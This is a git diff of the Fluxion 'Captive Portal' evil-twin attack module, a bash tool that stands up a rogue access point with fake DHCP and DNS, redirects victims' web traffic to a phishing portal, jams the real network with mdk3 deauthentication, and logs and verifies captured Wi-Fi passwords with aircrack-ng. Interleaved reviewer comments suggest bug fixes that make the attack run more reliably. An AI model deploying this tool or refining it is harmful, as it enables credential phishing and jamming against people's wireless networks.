@@ -386,38 +374,66 @@ function captive_portal_get_client_IP() { echo $MatchedClientIP } -function captive_portal_get_IP_MAC() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ] && [ "$(captive_portal_get_client_IP)" != "" ] && [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then - IP=$(captive_portal_get_client_IP) - MatchedClientMAC=$(cat $FLUXIONWorkspacePath/clients.txt | grep $IP | awk '{print $5}' | grep : | head -n 1 | tr [:upper:] [:lower:]) +captive_portal_get_IP_MAC() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ] && \ + [ "$(captive_portal_get_client_IP)" != "" ] && \ + [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then + local IP=$(captive_portal_get_client_IP) + local MatchedClientMAC=$( + cat $FLUXIONWorkspacePath/clients.txt | \ + grep $IP | awk '{print $5}' | grep : | head -n 1 | \ + tr [:upper:] [:lower:] + ) if [ "$(echo $MatchedClientMAC | wc -m)" != "18" ]; then - MatchedClientMAC="xx:xx:xx:xx:xx:xx" + local MatchedClientMAC="xx:xx:xx:xx:xx:xx" fi else - MatchedClientMAC="unknown" + local MatchedClientMAC="unknown" fi echo $MatchedClientMAC } -function captive_portal_get_MAC_brand() { - local MACManufacturer="" +captive_portal_get_MAC_brand() { if [ $(captive_portal_get_IP_MAC) != "" ]; then - MACManufacturer=$(macchanger -l | grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | cut -d " " -f 5-) + local MACManufacturer=$( macchanger -l | \ + grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | \ + cut -d " " -f 5-) if echo "$MACManufacturer" | grep -q x; then - MACManufacturer="unknown" + local MACManufacturer="unknown" fi else - MACManufacturer="unknown" + local MACManufacturer="unknown" fi echo $MACManufacturer } -# Create different settings required for the script -function captive_portal_set_attack() { - # AP Service: Prepare service for an attack. 
- if [ "$APRogueService" ]; then ap_prep + +captive_portal_unset_attack() { + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" + sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" + + # Only reset the AP if one has been defined. + if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then + ap_reset fi +} + +# Create different settings required for the script +captive_portal_set_attack() { + # Load and set the captive portal user interface. + cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" \ + "$FLUXIONWorkspacePath/captive_portal" + + find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec \ + sed -i -e 's/$APTargetSSID/'"${FluxionTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${FluxionTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${FluxionTargetChannel//\//\\\/}"'/g' {} \; + # Add the PHP authenticator scripts, used to verify # password attempts from users using the web interface. @@ -435,6 +451,13 @@ function captive_portal_set_attack() { cp -r "$FLUXIONPath/attacks/Captive Portal/lib/connectivity responses/" \ "$FLUXIONWorkspacePath/captive_portal/connectivity_responses" + + # AP Service: Prepare service for an attack. + if [ "$APRogueService" ]; then + ap_prep + fi + + # Generate the dhcpd configuration file, which is # used to provide DHCP service to APRogue clients. echo "\ 
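Review bot: In `captive_portal_set_attack`, the `find ... -exec sed -i` line builds its replacement text from `$FluxionTargetSSID`, `$FluxionTargetMAC` and `$FluxionTargetChannel` after escaping only `/`. An SSID is whatever the remote access point broadcasts, so `\`, `&` and newlines in it are interpreted by `sed` rather than copied, and the edit runs with the script's root privileges over every file in the workspace copy. I would add above it `# SSID is untrusted over-the-air input: escape \, & and / and reject control characters before using it in a sed replacement`, and do that escaping once in a helper instead of in three inline expansions. If the edited files are HTML, the value also needs entity escaping. The function continues in the following hunks.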
@@ -443,13 +466,13 @@ authoritative; default-lease-time 600; max-lease-time 7200; -subnet $VIGWNetwork.0 netmask 255.255.255.0 { - option broadcast-address $VIGWNetwork.255; - option routers $VIGWAddress; +subnet $CaptivePortalVIGWNetwork.0 netmask 255.255.255.0 { + option broadcast-address $CaptivePortalVIGWNetwork.255; + option routers $CaptivePortalVIGWAddress; option subnet-mask 255.255.255.0; - option domain-name-servers $VIGWAddress; + option domain-name-servers $CaptivePortalVIGWAddress; - range $VIGWNetwork.100 $VIGWNetwork.254; + range $CaptivePortalVIGWNetwork.100 $CaptivePortalVIGWNetwork.254; }\ " >"$FLUXIONWorkspacePath/dhcpd.conf" @@ -579,7 +602,7 @@ class DNSQuery: return packet if __name__ == '__main__': - ip='$VIGWAddress' + ip='$CaptivePortalVIGWAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -598,16 +621,17 @@ if __name__ == '__main__': chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"} # Attack arbiter script echo "\ #!/bin/bash -function signal_stop_attack() { +signal_stop_attack() { kill -s SIGABRT $$ # Signal STOP ATTACK handle_abort_authenticator } -function handle_abort_authenticator() { +handle_abort_authenticator() { AuthenticatorState=\"aborted\" } 
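Review bot: `local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"}` (hunk `-598/+621`) no longer escapes double quotes. The expression it replaces, `${APTargetSSIDClean//\"/\\\"}`, sat inside a double-quoted `echo` string where `\"` was a literal quote; outside that string the bare `"` opens a quoted pattern, so the expansion appears to remove the two-character sequence `/\` and leave any `"` in place. The value is then pasted between `\"...\"` in the generated authenticator script, so a quote in the SSID changes the shell syntax of that script. Outside quotes the equivalent is `${FluxionTargetSSIDClean//\"/\\\"}`, and `$` and backquotes need the same treatment before the value is written into shell text.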
@@ -670,25 +694,25 @@ while [ \$AuthenticatorState = \"running\" ]; do if [ -f \"$FLUXIONWorkspacePath/pwdattempt.txt\" -a -s \"$FLUXIONWorkspacePath/pwdattempt.txt\" ]; then # Save any new password attempt. - cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\" + cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\" # Clear logged password attempt. echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\" fi if [ -f \"$FLUXIONWorkspacePath/ip_hits\" -a -s \"$FLUXIONWorkspacePath/ip_hits.txt\" ]; then - cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" - echo \" \" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" + cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" + echo \" \" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" echo -n > \"$FLUXIONWorkspacePath/ip_hits\" fi " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". - if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then + if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | grep -qi \"Passphrase not in\"; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" sleep 1 
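Review bot: `if [ $CaptivePortalAuthenticatorMode = "hash" ]; then` is unquoted, here and in the hunks at `-741/+765` and `-763/+787`. When the mode is empty the test collapses to `[ = "hash" ]` and ends with a test error instead of evaluating to false; `if [ "$CaptivePortalAuthenticatorMode" = "hash" ]; then` avoids that. The generated-script text around it starts and ends outside this hunk.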
@@ -701,16 +725,16 @@ while [ \$AuthenticatorState = \"running\" ]; do fi" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi - local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") + local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host)) + DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalVIGWNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" printf \" SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\" - echo -e \" MAC ............: $CYel$APTargetMAC$CClr\" - echo -e \" Channel ........: $CWht$APTargetChannel$CClr\" - echo -e \" Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\" + echo -e \" MAC ............: $CYel$FluxionTargetMAC$CClr\" + echo -e \" Channel ........: $CWht$FluxionTargetChannel$CClr\" + echo -e \" Vendor .........: $CGrn${FluxionTargetMaker:-UNKNOWN}$CClr\" echo -e \" Runtime ........: $CBlu\$ih\$h:\$im\$m:\$is\$s$CClr\" echo -e \" Attempts .......: $CRed\$(cat $FLUXIONWorkspacePath/hit.txt)$CClr\" echo -e \" Clients ........: $CBlu\$(cat $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)$CClr\" @@ -741,7 +765,7 @@ while [ \$AuthenticatorState = \"running\" ]; do echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi 
@@ -763,18 +787,18 @@ echo \" FLUXION $FLUXIONVersion.$FLUXIONRevision SSID: \\\"$staticSSID\\\" -BSSID: $APTargetMAC ($APTargetMaker) -Channel: $APTargetChannel -Security: $APTargetEncryption +BSSID: $FluxionTargetMAC ($FluxionTargetMaker) +Channel: $FluxionTargetChannel +Security: $FluxionTargetEncryption Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand)) IP: $(captive_portal_get_client_IP) -\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" +\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " -aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\ +aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -782,7 +806,7 @@ aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDCle } # Generate the contents for a generic web interface -function captive_portal_generic() { +captive_portal_generic() { if [ ! -d "$FLUXIONWorkspacePath/captive_portal" ]; then mkdir "$FLUXIONWorkspacePath/captive_portal" fi @@ -876,8 +900,8 @@ function captive_portal_generic() {

-
$APTargetSSID ($APTargetMAC)
- +
$FluxionTargetSSID ($FluxionTargetMAC)
+

@@ -907,9 +931,10 @@ function captive_portal_generic() { " >"$FLUXIONWorkspacePath/captive_portal/index.html" } -function captive_portal_unset_routes() { +captive_portal_unset_routes() { if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then - iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" &>$FLUXIONOutputDevice + iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" \ + &> $FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules" else iptables --flush @@ -920,19 +945,21 @@ function captive_portal_unset_routes() { # Restore system's original forwarding state if [ -f "$FLUXIONWorkspacePath/ip_forward" ]; then - sysctl -w net.ipv4.ip_forward=$(cat "$FLUXIONWorkspacePath/ip_forward") &>$FLUXIONOutputDevice + sysctl -w net.ipv4.ip_forward=$( + cat "$FLUXIONWorkspacePath/ip_forward" + ) &> $FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" fi - ip addr del $VIGWAddress/24 dev $VIGW 2>/dev/null + ip addr del $CaptivePortalVIGWAddress/24 dev $VIGW 2>/dev/null } # Set up DHCP / WEB server # Set up DHCP / WEB server -function captive_portal_set_routes() { +captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. - ip addr add $VIGWAddress/24 dev $VIGW + ip addr add $CaptivePortalVIGWAddress/24 dev $VIGW # Save the system's routing state to restore later. cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" 
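Review bot: In `captive_portal_unset_routes` (hunk `-907/+931`), the saved rule set is deleted whether or not `iptables-restore` succeeded, so a failed restore leaves the host with the test-time NAT and `FORWARD ACCEPT` rules and no backup to retry from. Checking the status first, `iptables-restore < "$FLUXIONWorkspacePath/iptables-rules" &> "$FLUXIONOutputDevice" || return 1`, keeps the file until the original firewall state is back. The same applies to the `sysctl -w net.ipv4.ip_forward=$( ... )` restore in the next hunk (`-920/+945`), where the command substitution and `$FLUXIONOutputDevice` should also be quoted. Both functions extend beyond the lines shown.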
@@ -948,21 +975,24 @@ function captive_portal_set_routes() { iptables --table nat --delete-chain iptables -P FORWARD ACCEPT - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress:443 + iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ + --to-destination $CaptivePortalVIGWAddress:80 + iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ + --to-destination $CaptivePortalVIGWAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } -function captive_portal_stop_interface() { +captive_portal_stop_interface() { captive_portal_unset_routes - if [ "$APRogueService" ]; then ap_stop + if [ "$APRogueService" ]; then + ap_stop fi } -function captive_portal_start_interface() { +captive_portal_start_interface() { if [ "$APRogueService" ]; then echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" ap_start @@ -972,12 +1002,12 @@ function captive_portal_start_interface() { echo -e "$FLUXIONVLine Configuration for external access point device:" echo - fluxion_show_ap_info "$APRogueSSID" "OPEN" "$APTargetChannel" "$APRogueMAC" "$APTargetMaker" + fluxion_target_show "$APRogueSSID" "OPEN" "$FluxionTargetChannel" "$APRogueMAC" "$FluxionTargetMaker" - echo -e "$FLUXIONVLine IPv4 Address: ${VIGWAddress%.*}.2/24" + echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalVIGWAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv6 Address: Disabled" - echo -e "$FLUXIONVLine DHCP Server: $VIGWAddress" - echo -e "$FLUXIONVLine DNS Server: $VIGWAddress" + echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalVIGWAddress" + echo -e "$FLUXIONVLine DNS Server: $CaptivePortalVIGWAddress" echo echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" 
@@ -988,61 +1018,97 @@ function captive_portal_start_interface() { captive_portal_set_routes & sleep 3 - fuser -n tcp -k 53 67 80 443 &>$FLUXIONOutputDevice - fuser -n udp -k 53 67 80 443 &>$FLUXIONOutputDevice + fuser -n tcp -k 53 67 80 443 &> $FLUXIONOutputDevice + fuser -n udp -k 53 67 80 443 &> $FLUXIONOutputDevice } -function unprep_attack() { - CaptivePortalState="Not Ready" - captive_portal_unset_attack - captive_portal_unset_site - captive_portal_unset_conn - captive_portal_unset_cert - captive_portal_unset_auth - captive_portal_unset_interface -} -function prep_attack() { - while true; do - captive_portal_set_interface - if [ $? -ne 0 ]; then break; fi - captive_portal_set_auth - if [ $? -ne 0 ]; then - captive_portal_unset_interface - continue - fi - captive_portal_set_cert - if [ $? -ne 0 ]; then - captive_portal_unset_auth - continue - fi - captive_portal_set_conn - if [ $? -ne 0 ]; then - captive_portal_unset_cert - continue - fi - captive_portal_set_site - if [ $? -ne 0 ]; then - captive_portal_unset_conn - continue - fi - captive_portal_set_attack - if [ $? -ne 0 ]; then - captive_portal_unset_site - continue - fi - CaptivePortalState="Ready" - break +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$CaptivePortalCLIArguments" ]; then + if ! CaptivePortalCLIArguments=$( + getopt --options="a:j:s:c:u:h:" \ + --longoptions="ap:,jammer:,ssl:,connectivity:,ui:,hash:" \ + --name="Captive Portal V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit + fi + + declare -r CaptivePortalCLIArguments=$CaptivePortalCLIArguments + + eval set -- "$CaptivePortalCLIArguments" # Set environment parameters. 
+fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -a|--ap) + CaptivePortalAccessPointInterface=$2; shift;; + -j|--jammer) + CaptivePortalJammerInterface=$2; shift;; + -s|--ssl) + CaptivePortalSSLCertificatePath=$2; shift;; + -c|--connectivity) + CaptivePortalConnectivity=$2; shift;; + -u|--ui) + CaptivePortalUserInterface=$2; shift;; + -h|--hash) + # Assuming hash auth-mode here (the only one available as of now). + # WARNING: If more auth-modes are added, assume hash auth-mode here! + CaptivePortalHashPath=$2; shift;; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" done +} - # Check for prep abortion. - if [ "$CaptivePortalState" != "Ready" ]; then - unprep_attack +unprep_attack() { + CaptivePortalState="Not Ready" + + captive_portal_unset_attack + captive_portal_unset_user_interface + captive_portal_unset_connectivity + captive_portal_unset_certificate + captive_portal_unset_authenticator + captive_portal_unset_ap_interface + captive_portal_unset_jammer_interface +} + +prep_attack() { + local sequence=( + "set_jammer_interface" + "set_ap_interface" + "set_authenticator" + "set_certificate" + "set_connectivity" + "set_user_interface" + "set_attack" + ) + + if ! fluxion_do_sequence captive_portal sequence[@]; then return 1 fi + + CaptivePortalState="Ready" } -function stop_attack() { +stop_attack() { # Attempt to find PIDs of any running authenticators. 
local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') @@ -1050,32 +1116,35 @@ function stop_attack() { if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi if [ "$CaptivePortalJammerServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalJammerServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalJammerServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst" # Kill captive portal web server log viewer. if [ "$CaptivePortalWebServiceXtermPID" ]; then - kill $CaptivePortalWebServiceXtermPID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice CaptivePortalWebServiceXtermPID="" # Clear service PID fi # Kill captive portal web server. if [ "$CaptivePortalWebServicePID" ]; then - kill $CaptivePortalWebServicePID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice CaptivePortalWebServicePID="" # Clear service PID fi # Kill python DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDNSServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDNSServiceXtermPID="" # Clear parent PID fi # Kill DHCP service. if [ "$CaptivePortalDHCPServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDHCPServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt" 
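Review bot: The new option loop stores every `$2` as given, so the `--hash` and `--ssl` paths are accepted without checking that they name a readable file. Unless the `captive_portal_set_*` routines (outside this hunk) validate them later, reject bad values at parse time, e.g. `[ -r "$2" ] || { echo "Unreadable path: $2" >&2; fluxion_handle_exit; }` in those two arms. The loop condition also uses the deprecated `-a` operator inside `[ ]`; `while [ "$1" != "" ] && [ "$1" != "--" ]; do` is the unambiguous form. stop_attack, which opens at the end of this hunk, continues outside it.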
@@ -1085,7 +1154,7 @@ function stop_attack() { CaptivePortalState="Stopped" } -function start_attack() { +start_attack() { if [ "$CaptivePortalState" = "Running" ]; then return 0; fi if [ "$CaptivePortalState" != "Ready" ]; then return 1; fi CaptivePortalState="Running" 
@@ -1095,27 +1164,41 @@ function start_attack() { captive_portal_start_interface echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" - xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" -title "FLUXION AP DHCP Service" -e "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & - CaptivePortalDHCPServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ + -title "FLUXION AP DHCP Service" -e \ + "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & + # Save parent's pid, to get to child later. + CaptivePortalDHCPServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" -title "FLUXION AP DNS Service" -e "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & - CaptivePortalDNSServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ + -title "FLUXION AP DNS Service" -e \ + "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & + # Save parent's pid, to get to child later. + CaptivePortalDNSServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" - lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" &>$FLUXIONOutputDevice + lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ + &> $FLUXIONOutputDevice CaptivePortalWebServicePID=$! 
- xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" -title "FLUXION Web Service" -e "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & + xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" \ + -title "FLUXION Web Service" -e \ + "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & CaptivePortalWebServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" - echo -e "$APTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" -title "FLUXION AP Jammer Service [$APTargetSSID]" -e "mdk3 $WIMonitor d -c $APTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & - CaptivePortalJammerServiceXtermPID=$! # Save parent's pid, to get to child later. + echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $WIMonitor d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" - xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & + xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \ + -title "FLUXION AP Authenticator" \ + -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & } diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 9f50533..bbf7fb6 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh 
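Review bot: `CaptivePortalWebServicePID=$!` follows a `lighttpd -f … &> $FLUXIONOutputDevice` command that is redirected but never backgrounded, so `$!` still holds the PID of the previous background job, the DNS-service xterm started just above. stop_attack later runs `kill $CaptivePortalWebServicePID`, which would therefore signal the wrong process and leave the web server listening after teardown. Either keep lighttpd in the foreground as a shell job, `lighttpd -D -f "$FLUXIONWorkspacePath/lighttpd.conf" &> "$FLUXIONOutputDevice" &`, or have lighttpd.conf write a pid file and read the PID from it. start_attack begins before this hunk.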
@@ -2,6 +2,8 @@ # identifier: Captive Portal # description: Creates an "evil twin" access point. +CaptivePortalJammerInterfaceQuery="Select an interface for jamming." +CaptivePortalAPInterfaceQuery="Select an interface for the access point." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." diff --git a/language/en.sh b/language/en.sh index eed0268..a540dea 100755 --- a/language/en.sh +++ b/language/en.sh @@ -59,11 +59,11 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" -FLUXIONHashSourceRescanOption="Handshake directory (rescan)" +FLUXIONHashSourceRescanOption="Rescan handshake directory" FLUXIONFoundHashNotice="A hash for the target AP was found." FLUXIONUseFoundHashQuery="Do you want to use this file?" -FLUXIONUseFoundHashOption="Use hash" -FLUXIONSpecifyHashPathOption="Specify hash path" +FLUXIONUseFoundHashOption="Use hash found" +FLUXIONSpecifyHashPathOption="Specify path to hash" FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" From b15c6ec55c789cb28b6b6623e88b3a9dda066cfd Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:11:04 -0600 Subject: [PATCH 19/45] Fixed hash non-reset & verification bug. --- fluxion | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/fluxion b/fluxion index af2cea5..eabed45 100755 --- a/fluxion +++ b/fluxion 
